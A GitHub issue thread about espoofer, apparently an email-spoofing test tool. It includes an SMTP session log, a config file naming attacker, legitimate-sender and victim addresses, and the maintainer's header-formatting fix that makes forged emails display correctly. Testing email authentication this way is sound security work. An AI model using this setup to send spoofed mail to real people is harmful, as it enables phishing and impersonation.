Recipient email address not printed in mail client

Question

Recipient email address not printed in mail client

ismokaka opened this issue 3 years ago · comments

Hi,
In server mode, with all test cases, when email is received by the recipient his email address is not printed (see picture below).
Tested on Gmail, Protonmail, Outlook and the behavior is still the same.
The config.py file is configured as described in the wiki.

Jianjun Chen · Answer 1 · Fri Mar 12 2021 14:21:48 GMT+0800 (China Standard Time)

Looks like the To header is missing in the message data. Please provide the full console log printed by espoofer so that I can help you.

ismokaka · Answer 2 · Fri Mar 12 2021 23:13:26 GMT+0800 (China Standard Time)

Find below the full log printed (for privacy i changed my own domain by XXX.YY):

Start sending emails...
Connecting ('45.55.104.203', 25)
>>> 220 12c7dd814f66 ESMTP Haraka/2.8.26 ready

<<< ehlo helo.XXX.YY

>>> 250-12c7dd814f66 Hello Unknown [127.0.0.1]Haraka is at your service.
250-PIPELINING
250-8BITMIME
250-SMTPUTF8
250 SIZE 16777000

<<< mail from: <any@mailfrom.notexist.mydomain.com>

>>> 250 sender <any@mailfrom.notexist.mydomain.com> OK

<<< rcpt to: <xinah68067@naymio.com>

>>> 250 recipient <xinah68067@naymio.com> OK

<<< data

>>> 354 go ahead, make my day

<<< From: <admin@mydomain.com>
<xinah68067@naymio.com>Testing EspooferDate: Fri, 12 Mar 2021 14:57:55 +0000
Content-Type: text/plain; charset="UTF-8"
MIME-Version: 1.0
Message-ID: <1538085644648.096e3d4e-bc38-4027-b57e-87A0AE@message-ids.XXX.YY>
X-Email-Client: https://github.com/chenjj/espoofer

Just Testing. Regards
.

>>> 250 Message Queued (754E166F-87AF-4545-BC73-CFCF419852C9.1)

<<< quit

>>> 221 12c7dd814f66 closing connection. Have a jolly good day.

Finished.

The config.py file is :

config = {
        "attacker_site": b"XXX.YY", # attack.com
        "legitimate_site_address": b"admin@mydomain.com", # From header address displayed to the end-user
        "victim_address": b"xinah68067@naymio.com", # RCPT TO and message.To header address, 
        "case_id": b"server_a1", #  You can find all case_id using -l option.

        # The following fields are optional
        "server_mode":{
                "recv_mail_server": "", # If no value, espoofer will query the victim_address to get the mail server
                "recv_mail_server_port": 25,
                "starttls": False,
        },
        "client_mode": {
                "sending_server": ("smtp.gmail.com", 587),
                "username": b"attacker@gmail.com",
                "password": b"",
        },

        # You can customize the email message header or body here
        "subject_header": b"Testing Espoofer", 
        "to_header": b"<xinah68067@naymio.com>",  #  e.g., <alice@example.com>
        "body": b"Just Testing. Regards",

        # Set the raw email message you want to sent. It's used for replay attacks
        "raw_email": b"", 
}

Jianjun Chen · Answer 3 · Sat Mar 13 2021 02:50:43 GMT+0800 (China Standard Time)

Please try to change

        "subject_header": b"Testing Espoofer", 
        "to_header": b"<xinah68067@naymio.com>",  #  e.g., <alice@example.com>

to

        "subject_header": b"Subject: Testing Espoofer\r\n", 
        "to_header": b"To: <xinah68067@naymio.com>\r\n",  #  e.g., <alice@example.com>

ismokaka · Answer 4 · Sun Mar 14 2021 04:23:07 GMT+0800 (China Standard Time)

It works now.
Thanks, we can close the issue.